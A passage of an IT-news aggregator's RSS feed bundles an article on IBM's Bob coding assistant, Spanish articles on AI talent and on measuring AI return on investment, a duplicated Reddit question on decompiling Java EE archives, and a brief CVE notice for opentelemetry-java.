<p>Further, Bob is now equipped with ‘Bobalytics,’ a visibility and <a href="https://www.cio.com/article/4183502/why-is-it-so-hard-to-measure-the-roi-of-ai.html" target="_blank">cost optimization</a> tool for teams to help them maintain oversight, monitor use, and allocate resources.</p>



<p>“The goal is to help enterprises understand not only how much AI is being used, but if it’s creating meaningful value,” said Kwok.</p>



<p>Bobalytics is designed around multiple views, he explained. For instance, administrators need to see seat usage, consumption, governance controls, and activity visibility, while managers need insight into “team-level patterns,” such as who’s adopting Bob, which workflows are delivering value, and where teams may need support.</p>



<p>This can support important decision-making, Kwok said: Where adoption is high but value is low, teams may need better workflows or training; if a team has cost spikes, leaders need to know where and why, and take action accordingly.</p>



<h2 class="wp-block-heading">Bob’s specialized packages</h2>



<p>IBM has offered ways to help enterprises modernize across mainframes, <a href="https://www.infoworld.com/article/3993579/java-turns-30-and-theres-no-stopping-it-now.html" target="_blank">Java codebases</a>, and OSes for decades. Now, the company is incorporating that institutional knowledge into three pre-built, customizable workflows for Java modernization, IBM i, and IBM Z. The company says these are “structured, repeatable, auditable, and purpose-built.”</p>



<p>Bob for <a href="https://www.infoworld.com/article/2267843/exceptions-in-java-part-1-exception-handling-basics.html" target="_blank">Java modernization</a> helps teams migrate from Java 8 or earlier to Java 11, 17, 21, or 25, identifying compatibility issues, analyzing dependencies, coordinating code and configuration updates, and performing other important tasks.</p>



<p>For instance, a developer may ask Bob to assess an app for a Java version upgrade. Bob may have to inspect the build system, analyze dependencies, review framework usage, identify compatibility issues, read logs, understand test coverage, and propose an upgrade plan. Now it does those tasks in parallel, while subagents can handle focused investigations “without polluting the main conversation context,” Kwok said.</p>



<p>Bob for IBM i features curated skills and agentic workflows optimized for the IBM i OS. This includes refactoring “monolithic” apps into more modular modern structures, creating documentation, producing unit tests, and generating different types of code (COBOL, DDS, CL, RPG) for developers. Further, an ‘IBM i database mode’ allows Bob to emulate an experienced database engineer. </p>



<p>Mainframe environments have been notoriously difficult for AI integrations, and IBM says it is bringing AI-native app modernization to IBM Z for the first time, with COBOL and PL/I modernization and job control language (JCL) analysis.</p>



<p>Bob for IBM Z offers reusable skills; specialized modes that allow it to adapt to different tasks like code refactoring or architectural impact analysis, and the ability to write code, read, files, and execute commands.</p>



<p>For example, a developer may ask: “What impact will this field change have?” and Bob can use Z-specific analysis and metadata to reason across programs, copybooks, JCL, data flows, and subsystem interactions, Kwok noted. A subagent can explore one part of the system, summarize the relevant findings, and return only what the main agent needs to continue planning or executing the change. </p>



<p>Java, Z and i are all environments with different runtime assumptions, languages, integration patterns, governance needs, and operational constraints, he said, adding that IBM’s domain expertise is “a key differentiator.”</p>



<p>IBM will eventually broaden into other workflow-specific capabilities, he noted, in areas where “specialized workflows can materially improve real software delivery.”</p>



<h2 class="wp-block-heading">IBM Bob not ‘just another copilot’</h2>



<p>IBM Bob is not another copilot bolted onto your integrated development environment, said <a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group. Rather, it “builds security, testing, and governance into the generation step, so code arrives already checked instead of landing on the reviewers who were the bottleneck.”</p>



<p>Prompt normalization blocks unsafe instructions as they’re written, sensitive data is scanned and secrets detected in real time, and policy enforcement is continuous throughout the code lifecycle, he noted. Bob, rather than a human team, picks models, and built-in and custom models allow developers to move between planning, coding, and review without needing to switch tools. Further, Model Context Protocol (MCP) integration connects Bob to existing toolchains.</p>



<p>Most AI coding tools have typically worked in the same way: Generate code in a coding tool, paste it into an integrated development environment (IDE), then spend time fixing what broke, Bellamkonda pointed out. </p>



<p>Developers end up writing a lot of code and losing hours chasing bugs. Then code hits production, where every line still has to clear security review, testing, and compliance. And while, for example, AWS Kiro requires a spec before any code exists, then tests code against it, AWS Transform goes after the other end, modernizing old code and clearing tech debt in a continuous loop. </p>



<p>“IBM Bob works the same stage but bakes the checks into generation,” Bellamkonda noted.</p>



<p>“The whole industry reached the same conclusion this year: Bolt an accelerator onto an unchanged pipeline, and you move the bottleneck downstream,” he said. “The tools just differ by where they step in.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[¿Formar o contratar? Los CIO más avispados saben la respuesta sobre el talento en la era de la IA]]></title>
<description><![CDATA[El factor clave para el éxito de la implantación de la IA está pasando a ser, en gran medida, el talento disponible, y no las herramientas de IA instaladas, lo que ejerce presión sobre los responsables de TI para que mejoren las competencias de su plantilla. Dado que las competencias en IA son la...]]></description>
<link>https://tsecurity.de/de/3656399/it-nachrichten/formar-o-contratar-los-cio-ms-avispados-saben-la-respuesta-sobre-el-talento-en-la-era-de-la-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656399/it-nachrichten/formar-o-contratar-los-cio-ms-avispados-saben-la-respuesta-sobre-el-talento-en-la-era-de-la-ia/</guid>
<pubDate>Thu, 09 Jul 2026 10:47:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>El factor clave para el éxito de la implantación de la IA está pasando a ser, en gran medida, el talento disponible, y no las herramientas de IA instaladas, lo que ejerce presión sobre los responsables de TI para que mejoren las competencias de su plantilla. Dado que las competencias en IA son las más demandadas y las más difíciles de encontrar, muchos responsables de TI y sus colegas de la alta dirección están poniendo en marcha programas integrales de formación en IA para los empleados, tanto para los profesionales de TI que desarrollan las herramientas de IA como para los usuarios de la empresa que las utilizarán.</p>



<p>Las empresas inteligentes tendrán que invertir mucho en la mejora de las competencias, afirma <a href="https://www.devry.edu/newsroom/administration/chris-campbell.html" target="_blank" rel="nofollow">Chris Campbell</a>, director de sistemas de información de la Universidad DeVry (California, Estados Unidos). “El ritmo del cambio es sencillamente demasiado rápido como para depender únicamente de la contratación externa. Las organizaciones que desarrollen capacidades de IA entre su plantilla actual tendrán ventaja sobre aquellas que intenten ganar una guerra de ofertas por un grupo relativamente reducido de expertos”, relata.</p>



<p>Además, los elementos clave que conducen a una implementación beneficiosa de la IA han cambiado con el tiempo, añade. “Al principio, a todo el mundo le preocupaba el acceso a las herramientas de IA. Hoy en día, las herramientas están por todas partes. Lo que veo que cuesta a las organizaciones es averiguar cómo aplicarlas a problemas empresariales reales e integrarlas en la forma en que se lleva a cabo el trabajo en la práctica”, agrega.</p>



<p>En DeVry, algunos de los defensores más acérrimos de la IA no provienen de ámbitos tradicionales de la IA, sino de la ingeniería de software, el análisis empresarial, la ciberseguridad, la gestión de proyectos y las operaciones, afirma. “Entienden el negocio, saben dónde están los puntos de fricción y pueden ver dónde la IA puede generar valor. Esas habilidades suelen ser más importantes que una experiencia profunda en un modelo o herramienta concretos”, señala.</p>



<p>Es difícil encontrar profesionales con experiencia en IA, sobre todo cuando los responsables de TI buscan candidatos que hayan logrado llevar con éxito iniciativas de IA de la fase experimental a la de producción. “No creo que todas las empresas necesiten crear un gran equipo de especialistas en IA”, afirma Campbell. “En muchos casos, las personas mejor posicionadas para impulsar la adopción de la IA ya se encuentran dentro de la organización”.</p>



<h2 class="wp-block-heading">Mejora de las competencias para una cultura de creadores de IA</h2>



<p>La firma de servicios profesionales y contabilidad KPMG está abordando su reto de talento en IA impartiendo formación generalizada en IA a sus empleados, afirma <a href="https://www.linkedin.com/in/rema-serafi/" target="_blank" rel="nofollow">Rema Serafi</a>, vicepresidenta de fiscalidad de KPMG. El principal problema de muchas organizaciones en materia de IA en 2026 será la falta de talento, no la falta de tecnología, añade.</p>



<p>El 40% de los CIO encuestados para <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">el informe </a>‘<a href="https://us.resources.cio.com/resources/state-of-the-cio/" target="_blank" rel="nofollow">State of the CIO</a>‘ de este año señalaron la falta de talento interno como uno de los principales obstáculos para implementar sus estrategias de IA.</p>



<p>Para hacer frente a esto, KPMG ha puesto en marcha un programa piloto de formación en IA de seis semanas, con el objetivo de que todos los empleados puedan implementar sus propias herramientas de IA, explica Serafi. El programa familiariza a los empleados con Python y otras tecnologías que sirven de base para las herramientas internas de IA, añade.</p>



<p>KPMG también ha renovado la estructura de sus equipos para garantizar que tres categorías de empleados —usuarios avanzados de IA, creadores y desarrolladores— trabajen en estrecha colaboración, afirma Serafi. “Todo el mundo tendrá acceso a nuestras herramientas y todo el mundo será un usuario avanzado, hasta tal punto que aquellos profesionales que no contaban con conocimientos de IA al incorporarse, que no eran ingenieros ni tecnólogos, si quieren aprender, les certificaremos para que también puedan crear herramientas”, afirma.</p>



<p>Implementar herramientas de IA sofisticadas y de primera clase sin formar a los empleados es como comprar un coche de Fórmula 1 pero no contratar a un piloto profesional, dice. “Si no contamos con profesionales que sepan cómo utilizarla, no podrán sacar el máximo partido a lo que tienen a su disposición”, añade Serafi.</p>



<p>KPMG encargó un estudio a la Universidad de Texas (Estados Unidos) y descubrió que los empleados que utilizan la IA con regularidad producen un trabajo de mayor calidad y se sienten menos estresados. Los empleados que sean usuarios expertos en IA progresarán más rápido en sus carreras, sugiere. Sin embargo, uno de los retos de los programas de formación es mantenerse al día con la rapidez con la que evoluciona la IA. “De hecho, las funciones están cambiando en muy poco tiempo. Antes se veía a ingenieros tradicionales trabajando con IA, pero ahora se ven profesionales que realmente pueden orientar, dar forma y dirigir la IA en el trabajo que realizan para sus clientes”.</p>



<h2 class="wp-block-heading">Reciclaje profesional: “El único camino realista hacia el futuro”</h2>



<p>Otro defensor de la formación integral en IA para los empleados es <a href="https://www.linkedin.com/in/elmerm/" target="_blank" rel="nofollow">Elmer Morales</a>, fundador y director ejecutivo de Koder.com, una <em>startup </em>de programación de IA agente. Según él, encontrar talento externo en el ámbito de la IA se ha vuelto extremadamente difícil para la mayoría de las empresas.</p>



<p>“El reciclaje profesional ya no es opcional. Es el único camino realista a seguir para la mayoría de las organizaciones. El mercado de talento externo no puede satisfacer simultáneamente las necesidades de todas las empresas, y esperar a que las universidades se pongan al día no es una estrategia”, afirma.</p>



<p>Las empresas que triunfan con la IA consideran la mejora de las competencias como una inversión fundamental, no solo como una iniciativa de recursos humanos, añade Morales. “La falta de talento es, en estos momentos, el principal obstáculo concreto para las ambiciones en materia de IA. Las empresas pueden adquirir los mejores modelos, la mejor infraestructura y las mejores herramientas, y aun así no producir nada de valor porque carecen de personas que sepan cómo integrarlo todo en un sistema que realmente funcione en producción”, explica.</p>



<p>Morales sugiere que los responsables de TI recurran a su equipo de ingeniería actual para desarrollar el talento necesario para la implementación de la IA. “Los ingenieros que ya se dedican a esto con obsesión por las noches y los fines de semana, que lanzan proyectos personales y experimentan con nuevos modelos, solo necesitan permiso, recursos y un problema real que resolver. Los mejores equipos de IA que he visto no se crearon mediante la contratación, sino creando las condiciones para que las personas adecuadas dieran un paso al frente”, concluye.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best way to decompile and analyze a large Java EE application (.ear / .jar)?]]></title>
<description><![CDATA[I have a local copy of a large enterprise Java application (a .ear archive containing multiple .jar files, thousands of .class files). I need to understand how a specific part of the business logic works by reading the decompiled source. What's the best modern approach/toolchain for this in 2026?...]]></description>
<link>https://tsecurity.de/de/3655770/malware-trojaner-viren/best-way-to-decompile-and-analyze-a-large-java-ee-application-ear-jar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655770/malware-trojaner-viren/best-way-to-decompile-and-analyze-a-large-java-ee-application-ear-jar/</guid>
<pubDate>Thu, 09 Jul 2026 04:03:23 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have a local copy of a large enterprise Java application<br> (a .ear archive containing multiple .jar files, thousands<br> of .class files). I need to understand how a specific<br> part of the business logic works by reading the decompiled<br> source.</p> <p>What's the best modern approach/toolchain for this in 2026?</p> <p>- Which decompiler gives the most readable output for<br> large/complex codebases? (I've heard of JADX, Vineflower,<br> CFR, Procyon — which would you recommend?)<br> - Any good way to navigate and trace call flows across<br> thousands of classes once decompiled?<br> - Tips for dealing with obfuscated or hard-to-read<br> decompiled sections?</p> <p>I have legitimate access to the software (it's for<br> interoperability analysis). Just looking for the most<br> efficient workflow. Thanks!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/EPM_Finance"> /u/EPM_Finance </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umt9q7/best_way_to_decompile_and_analyze_a_large_java_ee/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umt9q7/best_way_to_decompile_and_analyze_a_large_java_ee/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best way to decompile and analyze a large Java EE application (.ear / .jar)?]]></title>
<description><![CDATA[I have a local copy of a large enterprise Java application (a .ear archive containing multiple .jar files, thousands of .class files). I need to understand how a specific part of the business logic works by reading the decompiled source. What's the best modern approach/toolchain for this in 2026?...]]></description>
<link>https://tsecurity.de/de/3655769/malware-trojaner-viren/best-way-to-decompile-and-analyze-a-large-java-ee-application-ear-jar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655769/malware-trojaner-viren/best-way-to-decompile-and-analyze-a-large-java-ee-application-ear-jar/</guid>
<pubDate>Thu, 09 Jul 2026 04:03:21 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have a local copy of a large enterprise Java application<br> (a .ear archive containing multiple .jar files, thousands<br> of .class files). I need to understand how a specific<br> part of the business logic works by reading the decompiled<br> source.</p> <p>What's the best modern approach/toolchain for this in 2026?</p> <p>- Which decompiler gives the most readable output for<br> large/complex codebases? (I've heard of JADX, Vineflower,<br> CFR, Procyon — which would you recommend?)<br> - Any good way to navigate and trace call flows across<br> thousands of classes once decompiled?<br> - Tips for dealing with obfuscated or hard-to-read<br> decompiled sections?</p> <p>I have legitimate access to the software (it's for<br> interoperability analysis). Just looking for the most<br> efficient workflow. Thanks!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/EPM_Finance"> /u/EPM_Finance </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umtaxk/best_way_to_decompile_and_analyze_a_large_java_ee/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umtaxk/best_way_to_decompile_and_analyze_a_large_java_ee/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45292 | open-telemetry opentelemetry-java up to 1.61.x allocation of resources (GHSA-rcgg-9c38-7xpx / WID-SEC-2026-2242)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in open-telemetry opentelemetry-java, opentelemetry-api and opentelemetry-extension-trace-propagators up to 1.61.x. Impacted is an unknown function. This manipulation causes allocation of resources.

This vulnerability is handled as CVE-2026...]]></description>
<link>https://tsecurity.de/de/3654307/sicherheitsluecken/cve-2026-45292-open-telemetry-opentelemetry-java-up-to-161x-allocation-of-resources-ghsa-rcgg-9c38-7xpx-wid-sec-2026-2242/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654307/sicherheitsluecken/cve-2026-45292-open-telemetry-opentelemetry-java-up-to-161x-allocation-of-resources-ghsa-rcgg-9c38-7xpx-wid-sec-2026-2242/</guid>
<pubDate>Wed, 08 Jul 2026 14:39:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/open-telemetry:opentelemetry-java">open-telemetry opentelemetry-java, opentelemetry-api and opentelemetry-extension-trace-propagators up to 1.61.x</a>. Impacted is an unknown function. This manipulation causes allocation of resources.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-45292">CVE-2026-45292</a>. The attack can be initiated remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[¿Por qué resulta tan difícil medir el ROI de la IA?]]></title>
<description><![CDATA[La multinacional farmacéutica danesa Novo Nordisk está muy interesada en acelerar el tiempo que se tarda en lanzar medicamentos al mercado a medida que expiran las patentes. “Si tienes un medicamento superventas, un retraso de una semana puede suponer entre 10 y 100 millones de dólares”, afirma S...]]></description>
<link>https://tsecurity.de/de/3654011/it-security-nachrichten/por-qu-resulta-tan-difcil-medir-el-roi-de-la-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654011/it-security-nachrichten/por-qu-resulta-tan-difcil-medir-el-roi-de-la-ia/</guid>
<pubDate>Wed, 08 Jul 2026 12:53:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La multinacional farmacéutica danesa Novo Nordisk está muy interesada en acelerar el tiempo que se tarda en lanzar medicamentos al mercado a medida que expiran las patentes. “Si tienes un medicamento superventas, un retraso de una semana puede suponer entre 10 y 100 millones de dólares”, afirma Stephanie Bova, responsable de transformación digital de la empresa. “Es una cantidad enorme, porque dispones de menos tiempo de protección mediante patente”.</p>



<p>La IA generativa ofrecía la posibilidad de acelerar drásticamente múltiples etapas del proceso de desarrollo de medicamentos. Y, dado que Novo Nordisk ya llevaba un seguimiento minucioso de la duración de sus procesos clave, contaba con una ventaja de la que carecían muchas otras empresas. Por lo tanto, debería haber sido relativamente sencillo incorporar un poco de IA generativa, ver cómo mejoraba la productividad y observar cómo llegaban los beneficios. Pero no fue tan fácil. El proceso de desarrollo de un fármaco consta de muchas partes, que tienen lugar en distintos momentos y en distintos departamentos. “Las personas son expertas en sus propios ámbitos, pero no necesariamente conocen el siguiente ámbito ni cómo encaja todo. El sistema es tan grande y complejo que no se puede ver todo el rendimiento de una sola vez”, afirma Bova.</p>



<p>Es posible que la documentación de los procesos no se corresponda con lo que la gente hace realmente en la práctica, y que diferentes personas realicen la misma tarea de formas distintas. Además, algunas tareas cruciales pueden pasar prácticamente desapercibidas desde fuera. El equipo de fabricación, por ejemplo, puede formar parte de un grupo completamente diferente y no ser consciente de que el medicamento se está preparando para su presentación ante la FDA (la agencia gubernamental estadounidense del medicamento), y que aún no tiene toda la documentación lista. “Así que has avanzado muy rápido solo para tener que esperar a que ellos te alcancen”, añade Bova.</p>



<p>Este es solo uno de los muchos retos a los que se enfrentan las empresas al intentar medir los resultados de los proyectos de IA, y la razón por la que las encuestas son tan contradictorias.</p>



<p>Si nos fijamos en las tareas individuales, Novo Nordisk puede demostrar mejoras en la productividad y claros beneficios positivos derivados del uso de la IA. Pero si damos un paso atrás y analizamos los resultados financieros de la empresa, el panorama se vuelve más confuso. En primer lugar, si se omiten pasos críticos, el tiempo de comercialización no mejorará. Además, un nuevo medicamento tarda años en llegar a los clientes, por lo que los efectos positivos en los resultados no se notarán hasta pasado un tiempo. Y eso es solo el principio del problema que plantea la medición del retorno de la inversión.</p>



<h2 class="wp-block-heading">Medición de procesos</h2>



<p>Para abordar los puntos ciegos de sus procesos, Novo Nordisk recurrió a la nueva generación de minería de procesos: gemelos digitales de las operaciones en tiempo real impulsados por IA. “Nos asociamos con la empresa de inteligencia de procesos Celonis para obtener un gemelo digital de nuestros datos de procesos. Fuimos los primeros del sector en aplicarlo al ámbito clínico”, explica Bova. La herramienta recopila información de los sistemas de la empresa para hacer un seguimiento de lo que los empleados hacen realmente, en lugar de utilizar encuestas para recabar información sobre lo que una parte de los empleados recordaba haber hecho en algún momento.</p>



<p>El primer proyecto consistió en un proceso sencillo de siete pasos y, al crear un gemelo digital del mismo, Novo Nordisk descubrió que, dependiendo de quién lo llevara a cabo, podía tratarse de un proceso de cinco o de nueve pasos. “Si reúnes a diez expertos en la materia en una sala, obtienes todo tipo de interpretaciones y, con el tiempo, se producen desviaciones”, cuenta.</p>



<p>El proyecto puso de manifiesto múltiples fallos en los procesos existentes. En algunos casos, fue necesario volver a formar a los empleados. En uno de ellos, hubo que actualizar la interfaz de usuario. Sin embargo, una vez que se estandariza un proceso, surge la oportunidad de tomar una “fotografía” de la situación anterior, de modo que haya algo con lo que comparar posteriormente y comprobar si la mejora mediante IA o la automatización arrojan algún resultado.</p>



<p>Otra cuestión que tuvieron que resolver de antemano fue decidir qué hacer con el tiempo ahorrado que se generara. “No quieres despedir a nadie”, afirma Bova. “Se trata de personal altamente cualificado y difícil de encontrar. Quizá deberíamos plantearnos redistribuir un poco los equipos”.</p>



<p>En la actualidad, la empresa cuenta con varios cientos de agentes de IA en funcionamiento, etiquetados dentro de la infraestructura del gemelo digital para poder identificarlos. “Si algo falla, sabemos exactamente dónde solucionarlo”, dice, y añade que la siguiente fase es la coordinación entre múltiples agentes. “Hoy en día, los tenemos conectados, pero no contamos con ‘agentes de agentes”.</p>



<p>Aún es demasiado pronto para saber si hay retorno de la inversión, ya que, en el desarrollo de fármacos, el proceso lleva años. “Pero, al analizar el proceso de principio a fin, espero que podamos recortar dos años del ciclo de desarrollo. Dos años menos hasta la comercialización, en comparación con la situación actual”»”, indica.</p>



<p>Los medicamentos que ya se encuentran en la fase final de desarrollo no experimentarán una aceleración tan notable, pero los que acaban de iniciarse serán los que más se beneficien. Sin embargo, los resultados finales no se verán hasta dentro de varios años.</p>



<p>La industria farmacéutica no es la única en la que el verdadero valor proviene de la optimización simultánea de múltiples procesos interconectados. <a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html" target="_blank" rel="nofollow">Según PwC</a>, los proyectos tácticos de IA a menudo no aportan un valor cuantificable, y los beneficios tangibles provienen de implementaciones a escala empresarial coherentes con la estrategia de negocio.</p>



<p>De hecho, muchas empresas no han experimentado ni un aumento de los ingresos ni una reducción de los costes gracias a la IA en los últimos 12 meses, a pesar de su adopción casi universal. Aun así, el gasto empresarial en IA se prevé que casi se duplique a finales de año en comparación con el año pasado, según <a href="https://kpmg.com/us/en/media/news/q1-ai-pulse2026.html" target="_blank" rel="nofollow">KPMG</a>.</p>



<h2 class="wp-block-heading">Medición de la productividad</h2>



<p>La mayoría de las empresas empiezan a pequeña escala, implantando <em>chatbots </em>de IA para los empleados con el fin de ayudar a mejorar la productividad. Y el ritmo de adopción en este ámbito ha sido asombrosamente alto, solo equiparado por la incapacidad de medir las ganancias de productividad que se supone que se deben alcanzar.</p>



<p>Disponer de una referencia es clave, afirma Anand Rao, profesor de IA en la Universidad Carnegie Mellon, de Estados Unidos, pero en algunos casos resulta difícil de medir y, en otros, es prácticamente imposible. Tomemos, por ejemplo, las decisiones relacionadas con los seguros, en las que los resultados pueden tardar años en hacerse evidentes. En el caso de los seguros de vida, podrían ser décadas, afirma. Y para algunos tipos de decisiones, las empresas no disponen de ningún tipo de indicador.</p>



<p>“Existe un estigma social a la hora de decir que estoy tratando de analizar tu proceso de toma de decisiones y lo bien que las estás tomando. Como seres humanos, no nos gusta que se evalúen nuestras decisiones”, señala. Luego, cuando una decisión sale bien al final, la gente se atribuye encantada el mérito. “Si la decisión sale mal, se achaca a factores externos”.</p>



<p>Pero incluso en el caso de tareas específicas en las que es posible realizar mediciones, las empresas a menudo no se esfuerzan por llevarlas a cabo antes de implementar herramientas de IA. “No partimos de una referencia”, apunta Julie Averill, antigua vicepresidenta ejecutiva y directora de sistemas de información global de la cadena de moda Lululemon. Averill es ahora directora general de Gold Thread, una consultora de transformación digital. “Partimos de la suposición de que la IA iba a ayudar a la gente a tomar mejores decisiones. Y eso te lleva a no poder medir bien los resultados”, explica.</p>



<p>Existen métricas alternativas que una empresa puede tener en cuenta en su lugar, añade, como las tasas de uso o la satisfacción de los usuarios. “Esto está ocurriendo y está aportando beneficios, algunos de los cuales se pueden ver y otros no. Hay que confiar en el proceso. Es igual que con la nube. Sabes que es el camino del futuro y puedes ver las ventajas, pero es difícil llegar hasta allí, y se requieren muchos cambios. Pero cuanto antes lo hagas, antes te habrás adaptado a la nueva forma de operar y podrás sacarle realmente partido”.</p>



<p>Hay otras áreas en las que es más fácil disponer de métricas concretas, como el servicio de atención al cliente. “Se trata de tareas repetitivas y suele ser el primer ámbito que las empresas automatizan con IA. Hay resultados muy tangibles que se pueden medir y se puede establecer una referencia muy sólida”, explica Averill.</p>



<p>Lululemon también lleva años utilizando la IA para mejorar la personalización y las recomendaciones, y esa es otra área que se puede cuantificar. Además, la automatización puede reducir la introducción manual de datos, lo que disminuye las tasas de error. La IA también se puede utilizar para ayudar en la supervisión del cumplimiento normativo, la detección de fraudes y el mantenimiento predictivo de los equipos, todos ellos casos de uso que se pueden cuantificar.</p>



<p>¿Pero la productividad de los empleados en general? Eso es difícil de medir, y no solo para Lululemon. Una forma obvia podría ser analizar los despidos en profesiones expuestas a la IA. Al fin y al cabo, los titulares están por todas partes. Pero en <a href="https://www.anthropic.com/research/labor-market-impacts" target="_blank" rel="nofollow">un informe publicado en marzo</a>, Anthropic no encontró indicios de un aumento del desempleo en las profesiones altamente expuestas, aquellas en las que las personas tienen más probabilidades de ser despedidas debido a la IA.</p>



<p>A principios de 2025, la empresa de investigación METR intentó cuantificar la productividad de los desarrolladores comparando la rapidez con la que los desarrolladores experimentados eran capaces de realizar tareas con IA y sin ella. ¿El resultado? Los desarrolladores afirmaron que esperaban que la IA les permitiera trabajar un 24% más rápido y estimaron que, en realidad, la IA les había permitido hacerlo un 20 % más rápido. Pero los datos revelaron una realidad totalmente diferente. El uso de la IA, en realidad, les ralentizó un 19%.</p>



<p>Por supuesto, las herramientas de IA están mejorando. METR intentó realizar un estudio de seguimiento, comparando de nuevo las tareas realizadas con y sin IA, pero no pudo encontrar suficientes desarrolladores dispuestos a volver al enfoque sin IA, a pesar de que los investigadores les pagaban por participar en el estudio.</p>



<p>Existen casos anecdóticos de empresas en las que un solo ingeniero realiza el trabajo de cien gracias al uso de la IA. O aquella vez en que se filtró accidentalmente todo el código fuente de Claude Code, de medio millón de líneas, y el desarrollador coreano Sigrid Jin creó una reconstrucción desde cero en dos horas, que luego subió a GitHub, donde se convirtió en el proyecto más rápido de la historia en alcanzar las 100.000 estrellas.</p>



<p>Pero, como ocurre con cualquier otro tema relacionado con la IA, la realidad es más compleja. En el caso concreto del desarrollo de software, escribir el código es, en realidad, solo una pequeña parte de lo que implica desarrollar software.</p>



<p>La consultora DX analizó recientemente métricas clave de ingeniería de 400 empresas y, en un informe reciente, constató que el uso de la IA había aumentado un 65% desde noviembre de 2024, pero que la productividad relacionada con la IA se situaba justo por debajo del 10%.</p>



<h2 class="wp-block-heading">Costes ocultos</h2>



<p>Al igual que resulta difícil medir los beneficios de la IA en términos de productividad, también puede resultar complicado cuantificar los costes. Cuando una empresa empieza a utilizar la IA, los costes pueden ser relativamente fáciles de estimar. ¿A cuánto ascienden las cuotas mensuales totales de suscripción a los chatbots de IA que utilizan los empleados? ¿Cuál es el coste de entrenar o ajustar un modelo personalizado? Pero cuando se pasa a casos de uso más complejos, los cálculos se vuelven más difíciles, afirma Averill. “Ahora existen todos los sistemas relacionados con la IA. Esos son más difíciles de cuantificar, pero su impacto es mayor”, dice.</p>



<p>Por ejemplo, si la IA se integra en los procesos empresariales mediante RAG, existe el gasto continuo de las llamadas a la API, pero también los cambios que hay que realizar en otros sistemas, explica. Y la cosa se complica cada día más. “No hemos realizado un esfuerzo muy concertado para implantar la telemetría y la instrumentación”, afirma Swaminathan Chandrasekaran, director global de IA y laboratorios de datos en KPMG. Según él, obtener una visión global de los costes totales de la IA en una empresa es como predecir el tiempo.</p>



<p>“La razón por la que contamos con un sistema de predicción meteorológica tan impresionante en este país es que disponemos de decenas de miles de estaciones meteorológicas que recopilan datos”, explica. “Sin eso, no sabríamos qué tiempo va a hacer”.</p>



<p>Las empresas deben implantar sistemas de medición para evaluar todos los aspectos del consumo relacionado con la IA, señala, empezando por el número de tokens utilizados, quién los utiliza y cómo se correlaciona esto con el rendimiento laboral. “Esa medición brilla por su ausencia”, afirma.</p>



<p>Al menos cuando los humanos utilizan <em>chatbots </em>de IA, hay un límite en el número de preguntas que son físicamente capaces de formular, además de unos costes de suscripción predecibles. Y cuando los procesos empresariales se habilitan con IA a través de RAG, las llamadas a la API de los modelos de lenguaje grandes (LLM) las realizan sistemas empresariales predecibles y programados de forma tradicional.</p>



<p>Pero ahora, la IA agentiva está empeorando aún más las cosas, ya que los agentes pueden actuar de forma impredecible y el número de llamadas a la API puede dispararse rápidamente fuera de control. En un informe del <a href="https://www.bcg.com/publications/2026/how-leaders-build-an-ai-first-cost-advantage" target="_blank" rel="nofollow">Boston Consulting Group</a>, dos tercios de las empresas señalan gastos de escalado de la IA incontrolables.</p>



<p>Otro coste que algunas empresas quizá no prevean bien, o que no controlen porque forma parte de un presupuesto diferente, es el relacionado con los datos. Ya sea preparando datos para el entrenamiento o el ajuste fino, utilizando incrustaciones de RAG o configurando el acceso directo a MCP a través de agentes, estos costes pueden acumularse rápidamente cuando entra en escena la IA.</p>



<p>“Las tarifas de salida son uno de los gastos más importantes”, afirma Tom Coughlin, miembro del IEEE y presidente de la consultora Coughlin Associates. “Si tienes que sacar datos de la nube, esas tarifas de salida podrían ser considerables”. Además, están todos los costes de personal que conlleva la implementación de la IA, añade.</p>



<p>“A largo plazo, la IA aportará un gran valor a las personas, pero estas deben saber cómo utilizarla correctamente. Si no cuentan con esas habilidades, se encontrarán en desventaja”, expone.</p>



